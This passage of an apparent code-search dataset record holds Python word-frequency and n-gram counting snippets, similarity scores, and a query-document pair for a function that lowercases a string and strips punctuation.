\"'s\" in word: #Done to remove extra keys in the dictionary, removes the possessive such that it counts \"Trump\" and \"Trump's\" as one word\r\n word = word[0:-2]\r\n elif \"s'\" in word:\r\n word = word[0:-1]\r\n if word != \"advertisement\":\r\n if word in dictionary:\r\n dictionary[word] +=1 #If it finds the word in the dictionary, the frequency has to increase by one\r\n else:\r\n dictionary[word] = 1 #If it finds a new word, it needs to add the word so the frequency is one\r", "def get_wordcount_obj(text):\r\n return dict2obj(get_wordcount(text))", "def get_letter_counts(str_):\n return dict(Counter(str_))", "def _word_counter(input_string: str) -> Dict[str, int]:\n # @todo Create a data type that can counts keys as they are added\n _current_word = ''\n parsed_words = {}\n\n for character in input_string.lower():\n if character in MaximalTextAnalyzer._letters:\n _current_word += character\n elif len(_current_word):\n parsed_words = MaximalTextAnalyzer._insert_into_dict(\n words_dict=parsed_words, key=_current_word)\n\n _current_word = ''\n\n # What if it does not end with a separator?\n if _current_word:\n parsed_words = MaximalTextAnalyzer._insert_into_dict(\n words_dict=parsed_words, key=_current_word)\n\n return parsed_words", "def create_dict(text):\n #On/Off case sensitivity\n text = text.lower() \n\n #handy one liner that splits words apart via whitespace, and \n #removes punctuation. 
Results in list of words.\n word_list = [s.strip(string.punctuation) for s in text.split()]\n \n d = dict()\n for word in word_list:\n d[word] = d.get(word, 0) +1\n return d", "def computeWordsFrequencies(self):\n token_stream = self._tokenize(self.readable)\n token_map = self._countTokens(token_stream)\n # print token_map.items()\n return sorted(token_map.items(), key = lambda x : x[1], reverse = True)", "def _create_freq_dist(self):\r\n freq_dict = dict()\r\n\r\n for element in self.data:\r\n if element in freq_dict:\r\n freq_dict[element] += 1\r\n else:\r\n freq_dict[element] = 1\r\n\r\n return freq_dict", "def word_frequency(words):\n freq = {}\n for w in words:\n cur_word = w.lower().strip(punctuation)\n freq[cur_word] = freq.get(cur_word, 0) + 1\n return freq", "def getTextStatsFeat(text, stemmRequired = True,\r\n excludeStopwordsRequired = True):\r\n #length = len(text)\r\n sentenceCount = len(re.findall(\"[.?!]\", text))\r\n exclamationMarkCount = len(re.findall(\"[!]\", text))\r\n questionMarkCount = len(re.findall(\"[?]\", text))\r\n digitsCount = len(re.findall(\"[0-9]+\", text))\r\n text = text.replace(\",\", \" \").replace(\".\", \" \")\r\n cleanText = re.sub('[^a-zа-я0-9]', ' ', text.lower())\r\n wordCount = 0.0\r\n charCount = 0.0\r\n rusCharCount = 0.0\r\n engCharCount = 0.0\r\n if excludeStopwordsRequired:\r\n for w in cleanText.split():\r\n if len(w)>1 and w not in stopwords:\r\n if not (not stemmRequired or re.search(\"[0-9a-z]\", w)):\r\n w = stemmer.stem(w)\r\n wordCount += 1\r\n c, rus, eng = getWordCharCount(w)\r\n charCount += c\r\n rusCharCount += rus\r\n engCharCount += eng\r\n else:\r\n for w in cleanText.split():\r\n if len(w)>1:\r\n if not (not stemmRequired or re.search(\"[0-9a-z]\", w)):\r\n w = stemmer.stem(w)\r\n wordCount += 1\r\n c, rus, eng = getWordCharCount(w)\r\n charCount += c\r\n rusCharCount += rus\r\n engCharCount += eng\r\n # per sentence\r\n wordPerSentence = tryDivide(wordCount, sentenceCount)\r\n charPerSentence = tryDivide(charCount, sentenceCount)\r\n rusCharPerSentence = tryDivide(rusCharCount, sentenceCount)\r\n engCharPerSentence = tryDivide(engCharCount, sentenceCount)\r\n # per word\r\n charPerWord = tryDivide(charCount, wordCount)\r\n rusCharPerWord = tryDivide(rusCharCount, wordCount)\r\n engCharPerWord = tryDivide(engCharCount, wordCount)\r\n # ratio\r\n rusCharRatio = tryDivide(rusCharCount, charCount)\r\n engCharRatio = tryDivide(engCharCount, charCount)\r\n rusCharVsEngChar = tryDivide(rusCharCount, engCharCount)\r\n engCharVsRusChar = tryDivide(engCharCount, rusCharCount)\r\n \r\n stats = [\r\n sentenceCount,\r\n wordCount,\r\n charCount,\r\n rusCharCount,\r\n engCharCount,\r\n digitsCount,\r\n exclamationMarkCount,\r\n questionMarkCount,\r\n wordPerSentence,\r\n charPerSentence,\r\n rusCharPerSentence,\r\n engCharPerSentence,\r\n charPerWord,\r\n rusCharPerWord,\r\n engCharPerWord,\r\n rusCharRatio,\r\n engCharRatio,\r\n rusCharVsEngChar,\r\n engCharVsRusChar,\r\n ]\r\n statsFeat = \"\"\r\n for i,f in enumerate(stats):\r\n if f != 0:\r\n statsFeat += \"%s:%s \" % (i+1, f)\r\n statsFeat = statsFeat[:-1] \r\n return statsFeat", "def dfc(text: str):\n #Splitting the text into a list\n wordlist = text.split()\n worddictionary = {}\n\n #Creating the wordlist dictionary\n for word in wordlist:\n if word in worddictionary:\n #Increase\n worddictionary[word] += 1\n else:\n #add to the dictionary\n worddictionary[word] = 1\n\n #Converting worddictionary into a dataframe\n df = pd.DataFrame.from_dict(worddictionary, orient='index')\n 
#Resetting index to a numerical one for ease of use\n df = df.reset_index()\n #Renaming the old string-valued index\n df = df.rename(columns={'index':'word'})\n #Defining two functions (over empty variables) to replace commas and dots\n remover = lambda x: x.replace(',','')\n remover2 = lambda x: x.replace('.','')\n #Using ( too many lines) to apply the functions\n df['word'] = df['word'].apply(remover)\n df['word'] = df['word'].apply(remover2)\n #Row-wise Subselection and assignment to remove words with a frequency smaller than 2\n df = df[df[0] > 2]\n #Renaming word frequncy\n df = df.rename(columns={0:'Frequency'})\n\n return df", "def get_frequencies(filename):\n freq_dict = {}\n _,long_name = filename.split(\"\\\\\")\n name,_ = long_name.split(\"_gold_\")\n f = os.path.join(PARSED, name + \".fix.xml\")\n #soup = bs(open(f, 'r'))\n soup = bs(codecs.open(f, 'r', encoding='utf-8'))\n for sent in soup.findAll('sentence'):\n for token in sent.findAll('token'):\n try:\n w = token.word.string\n if w in freq_dict:\n freq_dict[w] += 1\n else:\n freq_dict[w] = 1\n except AttributeError:\n pass\n return freq_dict", "def textSentencesLength(txt):\n\tsentencesLength = []\n\tfor sentence in txt:\n\t\tsentencesLength.append(len(sentence))\n\tprint \"The longest sentence is \", txt[sentencesLength.index(max(sentencesLength))]\n\tprint \"The shortest sentence is\", txt[sentencesLength.index(min(sentencesLength))]\n\tfrequencyDistribution = FreqDist(length for length in sentencesLength)\n\tfrequencyDistribution.plot()\n\tfrequencyDistribution.tabulate(samples=frequencyDistribution.keys())\n\treturn sentencesLength;", "def count_n_grams(data, n, start_token='<s>', end_token = '<e>'):\r\n \r\n # Initialize dictionary of n-grams and their counts\r\n n_grams = {}\r\n\r\n \r\n for sentence in data: # complete this line\r\n \r\n # prepend start token n times, and append <e> one time\r\n sentence = [start_token]*n + sentence + [end_token]\r\n \r\n # convert list to tuple\r\n # So that the sequence of words can be used as\r\n # a key in the dictionary\r\n sentence = tuple(sentence)\r\n\r\n \r\n for i in range(len(sentence)+1-n): # complete this line\r\n\r\n # Get the n-gram from i to i+n\r\n n_gram = sentence[i:i+n]\r\n\r\n # check if the n-gram is in the dictionary\r\n if n_gram in n_grams: \r\n \r\n # Increment the count for this n-gram\r\n n_grams[n_gram] += 1\r\n else:\r\n # Initialize this n-gram count to 1\r\n n_grams[n_gram] = 1\r\n \r\n return n_grams", "def __init__(self):\r\n #\r\n # Create dictionaries for each characteristic\r\n #\r\n self.words = {} # For counting words\r\n self.wordlengths = {} # For counting word lengths\r\n self.stems = {} # For counting stems\r\n self.sentencelengths = {} # For counting sentence lengths\r\n #\r\n # Create another of your own\r\n #\r\n self.gerund = {} # For counting words with ing \r\n self.text = ''", "def calculate_word_counts(text : Text)->Counter:\n return Counter(tokenized_text(text))", "def get_word_frequencies(topic_description):\n frequencies = {w:f for w,f in topic_description}\n return frequencies", "def getFrequencies(tweets):\n total_words = 0\n word_freq = {}\n for tweet in tweets:\n twext = tweet['clean_text']\n for word in twext.split(' '):\n word = word.strip()\n if word:\n total_words += 1\n if word not in word_freq:\n word_freq[word] = float(1)\n else:\n word_freq[word] += 1\n for key in word_freq:\n word_freq[key] = word_freq[key]/total_words\n return word_freq", "def get_frequencies(tokens):\n cnt = {}\n\n for word in tokens:\n if word not 
in cnt:\n cnt[word] = 0\n\n cnt[word] += 1\n\n return cnt", "def word_count(self):\n\n # split words on default word boundaries for words list\n words = self.phrase.split() \n\n # translate removes punctuation only, normalizes to lower case\n normalized_words = [self.normalize_word(w) for w in words]\n\n # removes empty strings after stripping punctuation\n filtered_words = [w for w in normalized_words if w]\n\n # sets up default dictionary, so all entries are 0\n word_counts = collections.defaultdict(int) #{}\n\n # define word counting function for use in reduce\n def count_word(dictionary, word):\n dictionary[word] = dictionary[word] + 1\n return dictionary\n\n # count words into dictionary from word list\n reduce(count_word, filtered_words, word_counts)\n\n return word_counts", "def getFreq(encrypted):\n freq = {}\n for i in encrypted:\n freq[i] = 0\n for i in encrypted:\n freq[i] += 1.0 \n return freq", "def get_word_count(my_str):\n my_list = my_str.split(\" \")\n my_map = {}\n for word in my_list:\n # Strip the word from any character\n word = word.strip(\".\")\n word = word.strip(\",\")\n # Convert word to all lowercase\n word = word.lower()\n if word not in my_map:\n my_map[word] = 1\n else:\n my_map[word] += 1\n\n return my_map", "def count_ngrams(self, corpus):\n \n self.unigramcounts = {} # might want to use defaultdict or Counter instead\n self.bigramcounts = {} \n self.trigramcounts = {} \n\n self.total = 2\n ##Your code here\n\n for sentence in corpus:\n temp_1 = get_ngrams(sentence,1)\n temp_2 = get_ngrams(sentence,2)\n temp_3 = get_ngrams(sentence,3)\n for i in range(len(temp_1)):\n if temp_1[i] in self.unigramcounts:\n self.unigramcounts[temp_1[i]] += 1\n else:\n self.unigramcounts[temp_1[i]] = 1\n self.total += 1\n\n for i in range(len(temp_2)):\n if temp_2[i] in self.bigramcounts:\n self.bigramcounts[temp_2[i]] += 1\n else:\n self.bigramcounts[temp_2[i]] = 1\n\n for i in range(len(temp_3)):\n if temp_3[i] in self.trigramcounts:\n self.trigramcounts[temp_3[i]] += 1\n else:\n self.trigramcounts[temp_3[i]] = 1\n return" ]
[ "0.7311082", "0.7273472", "0.719954", "0.7128146", "0.7035594", "0.6915477", "0.6807058", "0.67538345", "0.6753401", "0.6745445", "0.6740302", "0.67023945", "0.66921777", "0.6651242", "0.66414374", "0.6606957", "0.65921336", "0.6576811", "0.6570049", "0.6568746", "0.6565606", "0.6547006", "0.65094465", "0.65053964", "0.64608496", "0.6456815", "0.6447891", "0.64143354", "0.64090806", "0.64082813", "0.637803", "0.6373971", "0.63698965", "0.6359882", "0.6357308", "0.63448954", "0.6342788", "0.632319", "0.63086337", "0.6302139", "0.6298491", "0.6289316", "0.62749976", "0.626853", "0.62635577", "0.6241119", "0.62359005", "0.62276393", "0.6220667", "0.6216767", "0.620451", "0.6198752", "0.6194574", "0.617114", "0.61709166", "0.616778", "0.61649406", "0.61609346", "0.61588484", "0.61515045", "0.6143183", "0.61417973", "0.6137639", "0.61289096", "0.6103122", "0.6098141", "0.6093311", "0.6091146", "0.60756856", "0.6052952", "0.6052807", "0.60483694", "0.60470897", "0.60444254", "0.60307205", "0.6030662", "0.6021088", "0.60209864", "0.60193795", "0.60132617", "0.60119605", "0.6004764", "0.59987396", "0.59970605", "0.59941936", "0.59919745", "0.5988491", "0.5982034", "0.5981585", "0.5980841", "0.59787595", "0.59772086", "0.5959279", "0.5956923", "0.5954171", "0.5952946", "0.59510326", "0.59499705", "0.5948788", "0.59463394" ]
0.6100995
65
takes string s and removes all punctuation and changes all caps to lowercase
def cleanString(self, s):
        s = s.lower()
        for x in s:
            if x in punctuation:
                s = s.replace(x, '')
        return s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cap_case_str(s):\n return re.sub(r'(?:[_\\-\\s]+|^)(.)', lambda m: m.group(1).upper(), s)", "def change_title(s):\n\ts = re.sub(r\"[A-Za-z]+('[A-Za-z]+)?\",\n lambda mo: mo.group(0)[0].upper() +\n mo.group(0)[1:].lower(),s)\n\ts = s.split(\" \")\n\tfor i in range(len(s)):\n\t\tif (s[i] in \"Ii Iii Iv Vi Vii Viii Ix Ii: Iii: Iv: Vi: Vii: Viii: Ix:\"):\n\t\t\ts[i] = s[i].upper()\n\treturn \" \".join(s)", "def preprocess(self, s):\n stripped = re.sub(\"[^\\w\\s]\", \"\", s)\n stripped = re.sub(\"_\", \"\", stripped)\n\n stripped = re.sub(\"\\s+\", \" \", stripped)\n\n stripped = stripped.strip()\n\n return stripped.lower()", "def uncamel(s):\n for pat in uncamel_patterns:\n s = pat.sub(r'\\1_\\2', s)\n return s.lower()", "def uncamel(s):\n for pat in uncamel_patterns:\n s = pat.sub(r'\\1_\\2', s)\n return s.lower()", "def normalize(s):\n s = replace_whitespace(s)\n s = remove_dashes(s)\n s = s.lower()\n return s", "def ReplaceCapitals(string):\n\n newString = \"\"\n for char in string:\n if char.isupper():\n newString += \"_%s\"%char.lower()\n else:\n newString += char\n\n return newString", "def spinalcase(string):\n\n return re.sub(r\"_\", \"-\", snakecase(string))", "def process(self, s):\n # modified for project...\n return s.upper()", "def standardize(text):\n # FIXME regex restricts us to only ascii\n # FIXME move regex compilation outside\n p = re.compile('[^a-zA-Z]')\n retval = p.sub('', text)\n retval = retval.lower()\n return retval", "def lowercase(s):\n ls = \"\"\n for c in s:\n if c in string.ascii_uppercase:\n ls = ls + string.ascii_lowercase[string.ascii_uppercase.index(c)]\n else:\n ls = ls + c\n return ls", "def camel_to_spaces(s):\n subbed = _underscorer1.sub(r'\\1 \\2', s)\n return _underscorer2.sub(r'\\1 \\2', subbed).lower()", "def normalize(s):\n s = s.lower().replace(u' ', u'-')\n s = u''.join([c for c in s if c in string.letters + string.digits])\n return s", "def proper_title_case(s):\n nocaps = [\"the\"] # This needs to be extended.", "def to_clean_str(s: str) -> str:\n return re.sub(\"[^a-zA-Z0-9]\", \"\", s).lower()", "def capify(text):\n return text[0].upper() + text[1:]", "def uppersnakecase(string):\n\n return uppercase(snakecase(string))", "def clean_name(s):\n return re.sub('[\\W_]+', '', s).lower()", "def invert_capitalization(word):\n if word.islower():\n return word.upper()\n else:\n return word.lower()", "def remove_all_caps(text):\n return re.sub(r\"(\\b(?:[A-Z]+[a-z]?[A-Z]*|[A-Z]*[a-z]?[A-Z]+)\\b(?:\\s+(?:[A-Z]+[a-z]?[A-Z]*|[A-Z]*[a-z]?[A-Z]+)\\b)*)\",\n ' ', text)", "def clean_data(s):\n s = s.strip()\n s = s.lower()\n return s", "def _nice_case(line):\n line_lower = line.lower()\n s = \"\"\n i = 0\n nextCap = 1\n while i < len(line_lower):\n c = line_lower[i]\n if c >= \"a\" and c <= \"z\" and nextCap:\n c = c.upper()\n nextCap = 0\n elif c in \" .,;:\\t-_\":\n nextCap = 1\n s += c\n i += 1\n return s", "def capitalize1(s):\n return s[:1].upper() + s[1:]", "def sanitize(string):\n retval = string.lower()\n retval = re.sub(r\"[^\\w\\s]\", '', retval)\n retval = re.sub(r\"\\s+\", '_', retval)\n return retval", "def pascalcase(string):\n\n return capitalcase(camelcase(string))", "def to_camelcase(s):\n words = re.split(\"[^a-zA-Z0-9]+\", s)\n return \"\".join(\n w.lower() if i is 0 else w.title() for i, w in enumerate(words))", "def pascal_case(st) -> str:\n if st.find('-') != -1 or st.find('_') != -1:\n st = ''.join(a.capitalize() for a in re.split('-|_', st))\n return st[:1].upper() + st[1: len(st)]", "def camel(s):\n return s[0].upper() + 
s[1:]", "def fixString(string):\n string = re.sub(r\"[^A-Z-]\", \"\", string)\n return string", "def title_case(s):\n if not s:\n return None\n\n s = s.lower()\n parts = s.split(' ')\n lower_case = (\n 'a', 'an', 'and', 'as', 'at', 'by', 'for', 'in', 'of', 'on', 'or',\n 'the', 'to', 'with'\n )\n\n parts[0] = parts[0].title()\n parts = map(\n lambda part: part.title() if part not in lower_case else part,\n parts\n )\n\n return ' '.join(parts)", "def cap_first(word):\n return word[0].upper() + word[1:]", "def filter_lowercase(self, string):\n newstring = string.lower()\n return newstring", "def preprocess_titles(s: str) -> str:\r\n s = RE_SYMBOLS.sub(r'', s)\r\n s = s.translate(str.maketrans('', '', string.punctuation))\r\n s = re.sub('\\s+', ' ', s)\r\n s = s.lower()\r\n return unicodedata.normalize('NFKC', s)", "def __process_word(self, word):\n output = ''\n capitals = self.__capital_positions(word)\n c_index = 0\n\n for c in word:\n if c_index in capitals:\n output += c.upper()\n else:\n output += c.lower()\n\n c_index += 1\n\n return output", "def sanitize(str):\n res = str.lower()\n return res.replace(' ', '-')", "def no_caps_and_ponctuation(text):\n return re.sub(r'[^\\w\\s]', '', text).lower()", "def make_name2(u):\n\treturn re.sub(r'\\s+', '', u).lower()", "def CamelCaseToOutputFriendly(string):\n return re.sub('([A-Z]+)', r' \\1', string).strip().lower()", "def lower_without_diacritics(s):\n return filter(lambda u: not combining(u), normalize('NFKD', s)).lower()", "def snake_to_pascal(string):\n return string[0].upper() + re.sub('_([a-z])', lambda match: match.group(1).upper(), string[1:])", "def normalise(string):\n return re.sub(' +', ' ', string).lower()", "def not_capitalized(): # noqa: D416", "def upper(string):\n new_string = '' # Empty string to append to\n for char in string: # Itterate over each character in user's string\n if char.isalpha() and not char.isupper(): # If the character is an alphabet and not already uppercase\n char = (chr(ord(char) - 32)) # Subtract 32 from it's ASCI value to get the uppercase alphabet\n if char.isalnum() or char == ' ': # Preserve spaces, and ignore special characters such as punctuation etc.\n new_string += char # Append capitalized characters and spaces to the new string\n return new_string # return the capitalized string", "def normalize(string):\n\n normalized = []\n\n for ch in string:\n if ch.isalpha():\n normalized.append(ch.lower())\n\n target = \"\".join(normalized)\n return target", "def preprocess(string):\n cleaned = regex.sub(\" \", string)\n return cleaned.lower()", "def tr_upper_to_lower(text):\n out = []\n for ch in text:\n if ch in tr_upper_to_lower_dict:\n out.append(tr_upper_to_lower_dict[ch])\n else:\n out.append(ch.lower())\n \n return \"\".join(out)", "def _case_insensitive(s: str):\n return s.lower()", "def convert(name):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()", "def ucwords(string):\n erg=[ item.capitalize() for item in string.split( ' ' ) ]\n return ' '.join( erg )", "def correctCasing(words):\n strings = words.split(' ')\n strings = [s[0].upper()+s[1:].lower() for s in strings if s]\n return ' '.join(strings)", "def snakecase(string):\n\n string = re.sub(r\"[\\-\\.\\s]\", '_', str(string))\n if not string:\n return string\n return lowercase(string[0]) + re.sub(r\"[A-Z]\", lambda matched: '_' + lowercase(matched.group(0)), string[1:])", "def normalize(name):\n name = name.lower()\n name = name.replace('-', '')\n name = name.replace(' ', '')\n 
return name", "def normalize_case(text):\n text = str(text)\n return text.lower()", "def slugify(s):\n\treturn re.sub('[!@#$%^&*()\\\\\\\\/:.\"\"]+', '', s).replace(' ', '-').replace('--', '-').lower()", "def slugify(s):\n s = reg_nonchar.sub('-', s).lower()\n s = reg_dashes.sub('-', s)\n s = reg_outer_dashes.sub('', s)\n return s", "def first_lower(self, s):\n if len(s) == 0:\n return s\n else:\n return s[0].lower() + s[1:]", "def test_capitalize(self):\n self.assertEqual(\n minerals_extras.capitalize('mohs scale hardness'),\n 'Mohs Scale Hardness')", "def str(s):\n if s is None:\n l = \"\"\n else:\n l = str(s).lower()\n\n return l", "def string_to_snake_case(string:str) -> str:\n result_snake_case = str()\n for symb in string:\n if symb.isupper():\n symb = '_' + symb.lower()\n result_snake_case += symb\n return result_snake_case", "def toChar(s):\n s = s.lower()\n ans = \"\"\n for c in s:\n if c in \"abcdefghijklmnopqrstuvwxyz\":\n ans+=c\n return ans", "def to_camel_case(s):\n if s[:1].isupper() and '_' not in s:\n return s\n else:\n return snake_case_to_camel_case(s)", "def make_systematic_name(name):\n return \" \".join(re.findall(r\"([A-Z]+[a-z]*)\", name)).capitalize()", "def convert_to_snake_case(string: str) -> str:\n\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', string)\n draft = re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n return draft.replace('__', '_')", "def titleize(phrase):\n nl = phrase.split(' ')\n o=[]\n for i in nl:\n o.append(i[0].upper()+i[1:].lower())\n print(' '.join(o))", "def capitalcase(string):\n\n string = str(string)\n if not string:\n return string\n return uppercase(string[0]) + string[1:]", "def filter_words(st):\n\n filtered = \" \".join(st.capitalize().split())\n return filtered", "def scrub_string(str):\n return \"\".join(ch for ch in str if ch.isalpha() or ch.isdigit()).lower()", "def majuscule(string):\n\n res = \"\"\n toChange = True\n\n for letter in string:\n value_letter = ord(letter)\n isLetter = 65 <= value_letter and value_letter <= 92 or 96 <= value_letter and value_letter <= 122\n if isLetter:\n if toChange:\n res += chr(ord(letter) - 32)\n else:\n res += letter\n toChange = not toChange\n else:\n res += letter\n\n print(res)", "def fix_string_case(text):\n fixed = []\n for i in text:\n if is_case_sensitive(i):\n fixed.append(i)\n else:\n fixed.append(i.lower())\n return ''.join(fixed)", "def asciify(s):\n # http://en.wikipedia.org/wiki/Unicode_equivalence#Normal_forms\n return unicodedata.normalize('NFKD', s).encode('ascii', 'ignore')", "def _camel_killer(attr):\n try:\n attr = str(attr)\n except UnicodeEncodeError:\n attr = attr.encode('utf-8', 'ignore')\n s1 = _first_cap_re.sub('\\\\1_\\\\2', attr)\n s2 = _all_cap_re.sub('\\\\1_\\\\2', s1)\n return re.sub('_+', '_', s2.casefold() if hasattr(s2, 'casefold') else s2.lower())", "def normalize(s):\r\n def remove_articles(text):\r\n return re.sub(r'\\b(a|an|the)\\b', ' ', text)\r\n\r\n def white_space_fix(text):\r\n return ' '.join(text.split())\r\n\r\n def remove_punc(text):\r\n exclude = set(string.punctuation)\r\n return ''.join(ch for ch in text if ch not in exclude)\r\n\r\n def lower(text):\r\n return text.lower()\r\n\r\n return white_space_fix(remove_articles(remove_punc(lower(s))))", "def normalize(s):\r\n def remove_articles(text):\r\n return re.sub(r'\\b(a|an|the)\\b', ' ', text)\r\n\r\n def white_space_fix(text):\r\n return ' '.join(text.split())\r\n\r\n def remove_punc(text):\r\n exclude = set(string.punctuation)\r\n return ''.join(ch for ch in text if ch not in 
exclude)\r\n\r\n def lower(text):\r\n return text.lower()\r\n\r\n return white_space_fix(remove_articles(remove_punc(lower(s))))", "def capitalizestring(data):\n ss_list = capitalize_rex.split(data)\n ss = ''\n count = 0\n for phrase in ss_list:\n check = phrase.lstrip()\n\n # keep phrase's capitalization the same\n if check.find('{') == 0:\n ss += cap_rex.sub(r'\\1', phrase)\n else:\n # first word --> capitalize first letter (after spaces)\n if count == 0:\n ss += phrase.capitalize()\n else:\n ss += phrase.lower()\n count += 1\n return ss", "def rev_dash_snake_case(string_to_convert):\n return ''.join(i.capitalize() for i in string_to_convert.split('-'))", "def normalize_string(self, my_string):\n return (\n unicodedata.normalize(\"NFKD\", my_string)\n .encode(\"ASCII\", \"ignore\")\n .decode()\n .replace(\" \", \"_\")\n .lower()\n )", "def LCase(text):\n return text.lower()", "def role_name_from(s: str) -> str:\n return s.lower().replace(\" \", \"-\")", "def toPascelCase(name, perserveSep = False):\n\n if name == None or name.isspace():\n return \"\"\n\n name = toCamelCase(name, perserveSep)\n rslt = name[0].upper()\n\n i = 1\n while i < len(name):\n rslt += name[i]\n i += 1\n \n return rslt", "def word_capital(text):\n if text and len(text) > 0:\n return ' '.join([s[0].upper() + s[1:] for s in text.split(' ') if len(s) > 0])\n else:\n return text", "def UCase(text):\n return text.upper()", "def get_initials(name, force_upper=True):\r\n if force_upper:\r\n return name[0:1].upper()\r\n return name[0:1]", "def python_safe_name(s):\n no_punctuation = re.compile(r'[\\W_]', re.MULTILINE).sub\n s = s.lower()\n s = no_punctuation(' ', s)\n s = '_'.join(s.split())\n if py2 and isinstance(s, unicode):\n s = s.encode('ascii', 'ignore')\n return s", "def namecase(name):\n return re.sub(r\"[A-Za-z]+('[A-Za-z]+])?\",\n lambda mo: _namecase.get(mo.group(0).lower(),\n mo.group(0).title()),\n name)", "def capitalizeFirst(word):\n return word[0].upper() + word[1:]", "def clean_str(string):\n return string.strip().lower()", "def normalize_alphabet(sentence):\n marks = (\n ('á', 'a'), ('â', 'a'), ('ã', 'a'), ('à', 'a'),\n ('Á', 'A'), ('Â', 'A'), ('Ã', 'A'), ('À', 'A'),\n ('é', 'e'), ('ê', 'e'),\n ('É', 'E'), ('Ê', 'E'),\n ('í', 'i'),\n ('Í', 'I'),\n ('ó', 'o'), ('ô', 'o'), ('õ', 'o'),\n ('Ó', 'O'), ('Ô', 'O'), ('Õ', 'O'),\n ('ú', 'u'),\n ('Ú', 'U'),\n ('ç', 'c'),\n ('Ç', 'C'),\n )\n for mark in marks:\n sentence = re.sub(mark[0], mark[1], sentence)\n sentence = sentence.lower()\n sentence = re.sub(r'[?|\\.|!|:|,|;]', '', sentence)\n sentence = re.sub(r'^\\w+\\t+[^\\w]', '', sentence) # Drop tags (?!?)\n return str(sentence)", "def get_python_name(cls, name):\n first_cap_re = re.compile(\"(.)([A-Z](?!s([A-Z])*)[a-z]+)\")\n all_cap_re = re.compile(\"([a-z0-9])([A-Z])\")\n\n s1 = first_cap_re.sub(r\"\\1_\\2\", Utils._clean_name(name))\n return all_cap_re.sub(r\"\\1_\\2\", s1).lower()", "def fix_title(title):\n words = re.findall('[A-Z][^A-Z]*', title[0])\n final_str = \"\"\n for word in words:\n final_str += word + \" \"\n return final_str.strip()", "def checkCapitalizeName(self, stringToCheck):\n #https://stackoverflow.com/questions/15947614/regex-to-match-capitalized-words-with-a-single-space-between-them\n pattern = \"^[A-Z]\\w{1,16}( [A-Z]\\w{1,16})*$\"\n return True if re.search(pattern, stringToCheck) else None", "def get_casing(word):\n if len(word) == 0:\n return \"other\"\n elif word.isdigit(): # Is a digit\n return \"numeric\"\n elif word.islower(): # All lower case\n return \"allLower\"\n elif 
word.isupper(): # All upper case\n return \"allUpper\"\n # is a title, initial char upper, then all lower\n elif word[0].isupper():\n return \"initialUpper\"\n\n return \"other\"", "def format_camel(text):\r\n\toutput = \"\"\r\n\tfor i,w in enumerate(text.split(\" \")):\r\n\t\tif i > 0:\r\n\t\t\toutput += w[0].upper() + w[1:]\r\n\t\telse:\r\n\t\t\toutput += w\r\n\treturn output", "def normalize_word(word):\n\n return word.lower()", "def adjust_case(input_str):\n \"\"\"and the second block is lowercase. e.g. krpkq to KRPkq\"\"\"\n lower = input_str.lower()\n second_k = lower.find(\"k\", 1)\n # print(f\"second k at {second_k}\")\n out1 = lower[:second_k].upper()\n out2 = lower[second_k:]\n output_str = out1+out2\n if second_k == -1:\n output_str = \"fail\"\n return output_str", "def f03_04_extractCap(s):\n return re.findall('[A-Z]\\w*', s)", "def normalize_alef_hsb(s):\n\n return _ALEF_NORMALIZE_HSB_RE.sub(u'A', s)", "def normalize_text(s):\n import string, re\n\n def remove_articles(text):\n regex = re.compile(r\"\\b(a|an|the)\\b\", re.UNICODE)\n return re.sub(regex, \" \", text)\n\n def white_space_fix(text):\n return \" \".join(text.split())\n\n def remove_punc(text):\n exclude = set(string.punctuation)\n return \"\".join(ch for ch in text if ch not in exclude)\n\n def lower(text):\n return text.lower()\n\n return white_space_fix(remove_articles(remove_punc(lower(s))))", "def make_alphabetic(text):\n text = re.sub(r'[^A-Za-z\\s]', '', text)\n return text.lower()", "def name_to_goodreads(name):\n name = to_ascii(name.title())\n for char in CHARS:\n name = name.replace(*char)\n return name", "def case_i(string: str) -> str:\n return \"\".join(\"[\" + c.upper() + c.lower() + \"]\"\n if c.isalpha() else c for c in re.escape(string))", "def to_snake(string):\n\n return re.sub(r'(?<!^)(?=[A-Z])', '_', string).lower()" ]
[ "0.7568107", "0.7516122", "0.74232686", "0.7276909", "0.7276909", "0.7258973", "0.72260845", "0.7212958", "0.71921355", "0.71753323", "0.71484214", "0.70824426", "0.7060332", "0.70213103", "0.7021105", "0.7014167", "0.7006824", "0.6992608", "0.6962558", "0.6950061", "0.69467145", "0.6933975", "0.69203514", "0.68993384", "0.6876459", "0.68682534", "0.6862074", "0.68530923", "0.68508434", "0.68382794", "0.68125856", "0.67720336", "0.6763141", "0.6748474", "0.6715753", "0.67104846", "0.6689849", "0.66861594", "0.6685815", "0.6682977", "0.6673677", "0.6669629", "0.66493744", "0.6611579", "0.6610221", "0.6608825", "0.6604498", "0.6588293", "0.6578108", "0.65758705", "0.6566699", "0.65632606", "0.6559855", "0.65545285", "0.65500647", "0.65410405", "0.6538758", "0.6516342", "0.6505073", "0.6501592", "0.649915", "0.64895236", "0.64749926", "0.64683676", "0.64660686", "0.64615", "0.6450465", "0.6448203", "0.64466774", "0.6438728", "0.6434805", "0.6433802", "0.6433802", "0.642321", "0.64196676", "0.6419631", "0.6418346", "0.6417701", "0.6417671", "0.64154154", "0.64126873", "0.64050215", "0.63992435", "0.63924336", "0.63854873", "0.63779026", "0.63768375", "0.6367379", "0.635824", "0.635407", "0.6349516", "0.6347304", "0.6340972", "0.63386905", "0.63386774", "0.6333484", "0.6332744", "0.6327753", "0.63256973", "0.6319301", "0.6319126" ]
0.0
-1
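
As a rough standalone sketch of the cleaning routine documented in the record above (assuming Python's string.punctuation as the punctuation set and dropping the class context, so the name clean_string and the sample input are illustrative only):

from string import punctuation

def clean_string(s):
    # Lowercase the input, then strip every punctuation character.
    s = s.lower()
    for x in s:
        if x in punctuation:
            s = s.replace(x, '')
    return s

# Example usage (hypothetical input):
# clean_string("Hello, World!")  ->  "hello world"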